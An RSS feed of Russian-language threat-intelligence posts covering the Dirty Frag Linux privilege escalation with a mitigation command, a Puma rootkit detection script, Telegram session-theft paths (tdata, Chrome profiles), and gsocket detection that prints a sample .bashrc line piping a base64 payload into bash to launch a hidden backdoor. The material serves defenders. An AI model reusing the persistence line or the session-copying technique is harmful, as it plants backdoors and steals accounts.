<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>linux &#8211; PT ESC</title>
	<atom:link href="/tag/linux/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Wed, 30 Sep 2026 14:18:57 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>linux &#8211; PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Dirty Frag 🐧</title>
		<link>/dirty-frag/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Fri, 08 May 2026 12:08:09 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[avlab]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[sandbox]]></category>
		<guid isPermaLink="false">/dirty-frag-%f0%9f%90%a7/</guid>

					<description><![CDATA[Dirty Frag 🐧💥 Спустя неделю после нашумевшего Copy.Fail исследователь v4bel раскрыл новую технику повышения привилегий в ядре Linux — Dirty Frag. По состоянию на 8 мая у Dirty Frag нет CVE-номера и,…]]></description>
										<content:encoded><![CDATA[<p><strong>Dirty Frag 🐧</strong>💥</p>
<p>Спустя неделю после нашумевшего <a href="https://t.me/ptescalator/714" rel="noopener" target="_blank">Copy.Fail</a> исследователь v4bel <a href="https://github.com/V4bel/dirtyfrag" rel="noopener" target="_blank">раскрыл</a> новую технику повышения привилегий в ядре Linux — Dirty Frag.</p>
<p>По состоянию на 8 мая у Dirty Frag нет CVE-номера и, что более критично, официального патча от мейнтейнеров ядра тоже нет. Dirty Frag относится к тому же классу, что Dirty Pipe и Copy.Fail, но использует другой механизм: вместо pipe_buffer атакуется структура <code>sk_buff</code>.</p>
<p><em>Общие механизмы работы позволяют надежно блокировать эксплойт поведенческой экспертизой в PT Sandbox (Exploit.Linux.CVE-2022-0847.a, Exploit.Linux.CVE-2026-31431.a, Backdoor.Linux.Generic.a) — смотрите на скриншоте.</em></p>
<p><strong>Как это работает?</strong> 🧐</p>
<p>Dirty Frag — это цепочка из двух уязвимостей, которые дополняют друг друга, чтобы охватить все основные дистрибутивы:</p>
<p>1️⃣ Page-Cache Write (с 2017 года): предоставляет возможность для записи 4 байт в кэш страниц, но требует права на создание пользовательских пространств имен, что в некоторых системах (например, Ubuntu) может блокироваться AppArmor.</p>
<p>2️⃣ RxRPC Page-Cache Write (с июня 2023 года): не требует прав на пространства имен, но модуль <code>rxrpc.ko</code> присутствует только в некоторых дистрибутивах, включая Ubuntu, где он загружен по умолчанию.</p>
<p>Объединив их, атакующий получает рабочий эксплойт на любой системе, что позволяет:</p>
<p>• Подменить <code>suid-файлы</code> (например, <code>/usr/bin/su</code>) на свою версию<br />
• Изменить <code>/etc/passwd</code>, очистив пароль root-пользователя</p>
<p><strong>Кто под угрозой? ⛳️</strong></p>
<p>Практически все системы с ядром Linux, выпущенные с 2017 года. Исследователь подтвердил работу эксплойта на следующих версиях: Ubuntu 24.04.4, RHEL 10.1, openSUSE Tumbleweed, CentOS Stream 10, AlmaLinux 10, Fedora 44 и других.</p>
<p><strong>Как защититься? </strong><strong>🔧</strong></p>
<p>Так как официального патча от мейнтейнеров ядра пока нет, единственный способ защиты — немедленно отключить и выгрузить уязвимые модули ядра.</p>
<p><strong>Команда для отключения:</strong></p>
<pre><code>sh -c &quot;printf &#039;install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n&#039; &gt; /etc/modprobe.d/dirtyfrag.conf; rmmod esp4 esp6 rxrpc 2&gt;/dev/null; true&quot;</code></pre>
<p>Некоторые дистрибутивы (например, AlmaLinux) начали выпускать <a href="https://almalinux.org/blog/2026-05-07-dirty-frag/" rel="noopener" target="_blank">собственные патчи</a>, не дожидаясь апстрима.</p>
<p>UPD: уязвимость получила идентификатор — <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-43284" rel="noopener" target="_blank">CVE-2026-43284</a>, патч добавлен в код ядра (<a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4" rel="noopener" target="_blank">f4c50a4034e6</a>).</p>
<p><span class="hashtag">#avlab</span> <span class="hashtag">#cve</span> <span class="hashtag">#linux</span> <span class="hashtag">#sandbox</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a> (<a href="https://x.com/ptescalator" rel="noopener" target="_blank">X</a>, <a href="https://max.ru/join/V8dhsWy0FytLHcY_2m9KM99gsnBlr0v5RxOZFTOClho" rel="noopener" target="_blank">Max</a>)</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Мы бы очень хотели сделать для вас обзор «томатного гозе», но в пятницу вы проголосовали за новый разбор (Ex)Cobalt&#8230;</title>
		<link>/we-would-very-much-like-to-give-you-a-review-of-the-tomato-gose-but-on-friday-you-voted-for-a-new-analysis-of-excobalt/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 02 Dec 2025 12:06:47 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%bc%d1%8b-%d0%b1%d1%8b-%d0%be%d1%87%d0%b5%d0%bd%d1%8c-%d1%85%d0%be%d1%82%d0%b5%d0%bb%d0%b8-%d1%81%d0%b4%d0%b5%d0%bb%d0%b0%d1%82%d1%8c-%d0%b4%d0%bb%d1%8f-%d0%b2%d0%b0%d1%81-%d0%be%d0%b1%d0%b7%d0%be/</guid>

					<description><![CDATA[Мы бы очень хотели сделать для вас обзор «томатного гозе», но в пятницу вы проголосовали за новый разбор (Ex)Cobalt&#8230; 🙄 Это одна из наиболее активных и опасных групп, атакующих российские организации для…]]></description>
										<content:encoded><![CDATA[<p><strong>Мы бы очень хотели сделать для вас обзор «томатного гозе», но в пятницу вы проголосовали за новый разбор (Ex)Cobalt&#8230;</strong> 🙄<strong><br />
</strong><br />
Это одна из наиболее активных и опасных групп, атакующих российские организации для похищения конфиденциальных данных и уничтожения инфраструктуры.</p>
<p>Наряду с хорошо известными и проверенными инструментами — бэкдором Cobint, шифровальщиками Babuk и Lockbit, а также разного рода сетевыми туннелями — группа продолжает создавать и развивать новые средства, такие как Pumakit и Octopus 🐙</p>
<p>Обзор инструментов группы, которые она применяла в атаках в 2024–2025 годах, можно посмотреть <a href="https://ptsecurity.com/research/pt-esc-threat-intelligence/ex-cobalt-a-review-of-the-group-s-attack-tools-for-2024-2025/?utm_source=tg_esc&#038;utm_medium=excobalt&#038;utm_campaign=02_12" rel="noopener" target="_blank">в нашей статье</a>.</p>
<p><span class="hashtag">#dfir</span> <span class="hashtag">#ir</span> <span class="hashtag">#linux</span> <span class="hashtag">#ti</span> <span class="hashtag">#malware</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>По следам Puma: как обнаружить руткит через его же интерфейс</title>
		<link>/following-the-trail-of-puma-how-to-detect-a-rootkit-through-its-own-interface/</link>
		
		<dc:creator><![CDATA[ti_author]]></dc:creator>
		<pubDate>Wed, 09 Apr 2025 17:10:13 +0000</pubDate>
				<category><![CDATA[Threat Intelligence]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">http://localhost:8080/%d0%bf%d0%be-%d1%81%d0%bb%d0%b5%d0%b4%d0%b0%d0%bc-puma-%d0%ba%d0%b0%d0%ba-%d0%be%d0%b1%d0%bd%d0%b0%d1%80%d1%83%d0%b6%d0%b8%d1%82%d1%8c-%d1%80%d1%83%d1%82%d0%ba%d0%b8%d1%82-%d1%87%d0%b5%d1%80%d0%b5/</guid>

					<description><![CDATA[🐾 По следам Puma: как обнаружить руткит через его же интерфейс Сегодня в нашем обзоре технически интересный и многофункциональный руткит для Linux — Puma, недавно исследованный коллегами из Elastic Security Labs и…]]></description>
										<content:encoded><![CDATA[🐾 <strong>По следам Puma: как обнаружить руткит через его же интерфейс</strong><br />
<br />
Сегодня в нашем обзоре технически интересный и многофункциональный руткит для Linux — Puma, недавно исследованный коллегами из <a href="https://www.elastic.co/security-labs/declawing-pumakit" rel="noopener" target="_blank">Elastic Security Labs</a> и <a href="https://rt-solar.ru/solar-4rays/blog/5400/" rel="noopener" target="_blank">Solar 4RAYS</a>.<br />
<br />
Puma представляет собой комплексный руткит уровня ядра (LKM), нацеленный на длительное скрытное пребывание в системе и кражу учетных данных для перемещения в инфраструктуре жертвы. Закрепляется в системе путем подмены штатного cron на модифицированный вредоносный аналог, состоящий из нескольких компонентов:<br />
<br />
1️⃣ Загрузчик (<code>wpn.bin</code>) — отвечает за корректную установку модуля ядра.<br />
<br />
2️⃣ Легитимный cron (<code>tgt.bin</code>) — обеспечивает исправную работу cron, чтобы жертва не заметила подмены.<br />
<br />
3️⃣ LKM-модуль (<code>audit</code>) — основной компонент для перехвата системных вызовов и функций ядра Linux. Благодаря ему модуль эффективно скрывает процессы, файлы, директории и сетевые соединения, а также перехватывает чувствительную информацию, такую как учетные данные и криптографические ключи.<br />
<br />
4️⃣ Бэкдор (<code>libs.so</code>) — обеспечивает связь с C2-сервером, получение команд от злоумышленников и передачу результатов.<br />
<br />
🎯<strong> Любопытная деталь</strong><br />
<br />
Помимо стандартного удаленного управления через C2-сервер в Puma используется и локальное, реализованное через переопределенный системный вызов rmdir: при наличии определенных аргументов руткит интерпретирует вызов как команду и возвращает инициировавшему процессу результат выполнения. Так, бэкдор использует этот механизм, чтобы запросить у модуля конфигурацию удаленного сервера или отобразить перехваченные конфиденциальные данные.<br />
<br />
<strong>🔎 Что нам удалось обнаружить</strong><br />
<br />
Анализируя Puma, мы выявили в LKM-модуле важную уязвимость: он не проверяет, какой именно процесс вызывает переопределенный rmdir для выполнения команд. Таким образом, вызвав rmdir с определенными аргументами, можно однозначно определить присутствие руткита в системе.<br />
<br />
<strong>📌 Почему это важно</strong><br />
<br />
Уязвимость трудноустранима: злоумышленники, используя возможности бэкдора, могут обновлять лишь его код, но не код загруженного в систему модуля ядра. Для этого потребуется значительно больше усилий. Таким образом, уязвимость можно использовать для быстрого детекта Puma в инфраструктуре.<br />
<br />
🐍 Для удобства мы написали небольшой Python-скрипт, который поможет вам определить руткит в системе:<br />
<br />
<pre class="wp-block-code"><span><code lang="python" class="hljs language-python language-python"><span class="hljs-keyword">import</span> ctypes
<span class="hljs-keyword">import</span> subprocess
<span class="hljs-keyword">import</span> os

SYS_rmdir = <span class="hljs-number">84</span>  

buffer_size = <span class="hljs-number">16</span>
path_buf = ctypes.create_string_buffer(buffer_size)
ctypes.memmove(path_buf, <span class="hljs-string">b"zarya.u\0"</span>, <span class="hljs-number">7</span>)

libc = ctypes.CDLL(<span class="hljs-string">"libc.so.6"</span>, use_errno=<span class="hljs-literal">True</span>)
ret = libc.syscall(SYS_rmdir, path_buf)

<span class="hljs-keyword">try</span>:
    proc = subprocess.Popen(
        <span class="hljs-string">"lsmod | grep audit"</span>,
        shell=<span class="hljs-literal">True</span>,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=<span class="hljs-literal">True</span>
)
    output, _ = proc.communicate()

    <span class="hljs-keyword">if</span> output.strip():
        path_buf2 = ctypes.create_string_buffer(buffer_size)
        ctypes.memmove(path_buf2, <span class="hljs-string">b"zarya.t.0\0"</span>, <span class="hljs-number">9</span>)
        ret2 = libc.syscall(SYS_rmdir, path_buf2)
        
        <span class="hljs-keyword">if</span> ret2 == <span class="hljs-number">0</span>:
            print(<span class="hljs-string">f"Pumakit detected on this machine, module info:\n<span class="hljs-subst">{output.strip()}</span>"</span>)
        <span class="hljs-keyword">else</span>:
            print(<span class="hljs-string">"Pumakit wasn't detected at this machine"</span>)
    <span class="hljs-keyword">else</span>:
        print(<span class="hljs-string">"Pumakit wasn't detected at this machine"</span>)

<span class="hljs-keyword">except</span> Exception <span class="hljs-keyword">as</span> e:
    print(<span class="hljs-string">"Error:"</span>, e)
</code></span></pre><br />
<br />
Не самый типичный случай — когда уязвимость играет не против защитника, а ему на руку. Такое бывает нечасто, но именно это дает возможность для точного детекта.<br />
<br />
⚠️ Если вы обнаружили Puma, то в инфраструктуре почти наверняка есть и другое ВПО. Обязательно обратитесь за помощью к специалистам по реагированию на инциденты информационной безопасности.<br />
<br />
<span class="hashtag">#TI</span> <span class="hashtag">#detect</span> <span class="hashtag">#malware</span> <span class="hashtag">#linux</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>«Чего не отвечаете?», или История о том, как угнать Telegram-аккаунт без регистрации и смс</title>
		<link>/why-arent-you-answering-or-the-story-of-how-to-hijack-a-telegram-account-without/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Thu, 13 Mar 2025 16:18:22 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[macos]]></category>
		<category><![CDATA[web]]></category>
		<category><![CDATA[win]]></category>
		<guid isPermaLink="false">/%d1%87%d0%b5%d0%b3%d0%be-%d0%bd%d0%b5-%d0%be%d1%82%d0%b2%d0%b5%d1%87%d0%b0%d0%b5%d1%82%d0%b5-%d0%b8%d0%bb%d0%b8-%d0%b8%d1%81%d1%82%d0%be%d1%80%d0%b8%d1%8f-%d0%be-%d1%82%d0%be%d0%bc/</guid>

					<description><![CDATA[😐 «Чего не отвечаете?», или История о том, как угнать Telegram-аккаунт без регистрации и смс Недавно мы написали статью о наиболее популярных методах кражи учетных записей в Telegram. 😑 В статье рассматриваются…]]></description>
										<content:encoded><![CDATA[<p>😐 <strong> «Чего не отвечаете?», или История о том, как угнать Telegram-аккаунт без регистрации и смс</strong></p>
<p>Недавно мы <a href="https://habr.com/ru/companies/pt/articles/889692/" rel="noopener" target="_blank">написали статью</a> о наиболее популярных методах кражи учетных записей в Telegram.</p>
<p>😑 <strong>В статье рассматриваются такие схемы, как:</strong></p>
<p><strong>•</strong> Распространение фишинговых сообщений о получении Premium-подписки.<br />
<strong>•</strong> Отправка сообщений с просьбой помочь в голосовании.<br />
<strong>•</strong> Получение кода авторизации под видом сотрудников техподдержки, правоохранительных органов и т. п.<br />
<strong>•</strong> Выпуск дубликата сим-карты.<br />
<strong>•</strong> Копирование файлов с активными пользовательскими сессиями.</p>
<p><strong>Из того, что особенно интересно:</strong></p>
<p>🖥 Рассматриваются нюансы для официальных десктопных версий и веб-клиентов приложений.</p>
<p>🔜 Кража сессий при копировании <code>tdata</code>, (<code>appstore</code>, <code>stable</code> — для macOS) с ключами авторизации устройства (authorization key) остается незаметной для пользователя (отсутствует информация о дополнительной сессии в списке активных устройств).</p>
<p>☝️ Конфиденциальная информация, которая интересует злоумышленников, чаще всего хранится в каталогах:</p>
<p><strong>Для Windows:</strong> <code>C:\Users\&lt;Имя пользователя&gt;\AppData\Roaming\TelegramDesktop\tdata</code></p>
<p><strong>Для Linux:</strong> <code>/home/&lt;Имя пользователя&gt;/.local/share/TelegramDesktop/tdata</code></p>
<p><strong>Для macOS, клиент версии Telegram for Mac:</strong> <code>HDD/Users/&lt;Имя пользователя&gt;/Library/Application Support/Telegram Desktop/tdata</code></p>
<p><strong>Для macOS, клиент версии Telegram for macOS:</strong> <code>HDD/Users/&lt;Имя пользователя&gt;/Library/GroupContainers/6N38VWS5BX.ru.keepcoder.Telegram/appstore</code> (<code>stable</code>, если устанавливали через DMG-файл)</p>
<p>🌐 При использовании веб-версий украсть учетную запись можно имея физический доступ к устройству.</p>
<p>Для <code>Google Chrome</code> злоумышленники копируют содержимое каталогов:</p>
<p><strong>Windows:</strong> <code>C:\Users\&lt;Имя пользователя&gt;\AppData\Local\Google\Chrome\User Data\Default</code></p>
<p><strong>Linux:</strong> <code>/home/&lt;Имя пользователя&gt;/.config/google-chrome/Default</code></p>
<p><strong>macOS:</strong> <code>HDD/Users/&lt;Имя пользователя&gt;/Library/Application Support/Google/Chrome/Default</code></p>
<p>💻 Нет разницы, в какой операционной системе злоумышленник использует украденную информацию: <strong>tdata с Windows может применяться для авторизации как на Linux, так и на macOS</strong>. Это также работает с веб-версиями.</p>
<p>🔗 При переходе по ссылке <code>https://web.telegram.org/</code> из приложения на компьютере или мобильном устройстве генерируется токен доступа к содержимому учетной записи — возможно войти в веб-версию Telegram. Попробуйте сами!</p>
<p>📝 Даются рекомендации, как выявить нелегитимные сессии и обезопасить себя от рассмотренных атак.</p>
<p>Полный текст статьи <a href="https://habr.com/ru/companies/pt/articles/889692/" rel="noopener" target="_blank">читайте на Хабре</a>.</p>
<p><span class="hashtag">#dfir</span> <span class="hashtag">#macos</span> <span class="hashtag">#win</span> <span class="hashtag">#linux</span> <span class="hashtag">#web</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Gsocket: как найти один из самых популярных инструментов</title>
		<link>/gsocket-how-to-find-one-of-the-most-popular-tools/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Thu, 03 Oct 2024 17:26:51 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[hacktool]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">http://localhost:8080/gsocket-%d0%ba%d0%b0%d0%ba-%d0%bd%d0%b0%d0%b9%d1%82%d0%b8-%d0%be%d0%b4%d0%b8%d0%bd-%d0%b8%d0%b7-%d1%81%d0%b0%d0%bc%d1%8b%d1%85-%d0%bf%d0%be%d0%bf%d1%83%d0%bb%d1%8f%d1%80%d0%bd%d1%8b%d1%85-%d0%b8/</guid>

					<description><![CDATA[Gsocket: как найти один из самых популярных инструментов 🙂 В процессе расследования множества инцидентов, связанных с компрометацией Linux-узлов, мы часто обнаруживаем на них различные хакерские инструменты. Одним из самых популярных из них…]]></description>
										<content:encoded><![CDATA[<strong>Gsocket: как найти один из самых популярных инструментов</strong> 🙂<br />
<br />
В процессе расследования множества инцидентов, связанных с компрометацией Linux-узлов, мы часто обнаруживаем на них различные хакерские инструменты.<br />
<br />
Одним из самых популярных из них является <a href="https://github.com/hackerschoice/gsocket" rel="noopener" target="_blank">gsocket.</a> Хакеры часто используют его для подключения к скомпрометированным узлам.<br />
<br />
🔦  Для обнаружения признаков установки инструмента можно искать следующее:<br />
<br />
1️⃣<strong> Сервис с именем D-Bus System Connection Bus:</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="bash" class="hljs language-bash language-bash">
systemctl | grep <span class="hljs-string">"D\-Bus System Connection Bus"</span></code></span></pre><br />
<br />
<strong>Пример:</strong><br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">EVILSERVICE.service                                                                    loaded active running   D-Bus System Connection Bus</code></span></pre><br />
<br />
2️⃣<strong> Файлы, через которые может осуществляться закрепление в системе и в которых встречаются строки по следующему паттерну: </strong><br />
<br />
<code>&#039;D\-Bus System Connection Bus|GS_ARGS\=|echo .+\|base64 \-d\|bash.+seed prng.+kernel&#039;</code><br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">
egrep -ar 'D\-Bus System Connection Bus|GS_ARGS\=' /usr/lib/systemd/ /{lib,run,etc}/systemd/
egrep -aor 'echo .+\|base64 \-d\|bash.+seed prng.+kernel' /</code></span></pre><br />
<br />
👀 <strong>Пример (service-файл):</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">
Description=D-Bus System Connection Bus
After=network.target

&#91;Service]
Type=simple
Restart=always
RestartSec=10
WorkingDirectory=/root
ExecStart=/bin/bash -c "GS_ARGS='-ilq' exec -a '&#91;abc]' '/usr/bin/abc'"

&#91;Install]
WantedBy=multi-user.target</code></span></pre><br />
<br />
👀 <strong>Пример (.bashrc):</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="go" class="hljs language-go language-go">
# ~/.bashrc: executed by bash(<span class="hljs-number">1</span>) <span class="hljs-keyword">for</span> non-login shells.
# DO NOT REMOVE THIS LINE. SEED PRNG. #defunct-kernel
{ echo L3Vzci9iaW4vcGtpbGwgLTAgLVUxMDAxIGFiYyAyPi9kZXYvbnVsbCB8fCAoVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPSItayAvaG9tZS91c2VyLy5jb25maWcvaHRvcC9hYmMuZGF0IC1saXFEIiBleGVjIC1hICdbYWJjNXJyXScgJy9ob21lL3VzZXIvLmNvbmZpZy9odG9wL2FiYycgMj4vZGV2L251bGwpCg==|base64 -d|bash;} <span class="hljs-number">2</span>&gt;/dev/null #<span class="hljs-number">34</span>uhu4gg3g3g34g3 &gt;/dev/random # seed prng abc-kernel
# see /usr/share/doc/bash/examples/startup-files (in the <span class="hljs-keyword">package</span> bash-doc)
# <span class="hljs-keyword">for</span> examples

# If not running interactively, don<span class="hljs-string">'t do anything
case $- in
    *i*) ;;
      *) return;;
esac
....</span></code></span></pre><br />
<br />
📌 <strong>Для обнаружения признаков наличия инструмента на периметре можно поискать узлы, взаимодействующие с gsocket․io, а также серверами из </strong><a href="https://t.me/CyberSquattingChannel/4471" rel="noopener" target="_blank">поста.</a><br />
<br />
📃 <strong>Рекомендации по дальнейшим действиям:</strong><br />
<br />
1️⃣ Заблокировать адреса управляющих серверов;<br />
<br />
2️⃣<strong> </strong>Удалить файлы, относящиеся к gsocket, а также изменить файлы, через которые gsocket закрепился в системе;<br />
<br />
3️⃣ Перезагрузить скомпрометированный хост;<br />
<br />
4️⃣ Осуществить поиск подозрительных входов по сети и проверку логов веб-сервера (если он есть и торчит наружу).<br />
<br />
<span class="hashtag">#DFIR</span> <span class="hashtag">#detect</span> <span class="hashtag">#hacktool</span> <span class="hashtag">#tips</span> <span class="hashtag">#linux</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
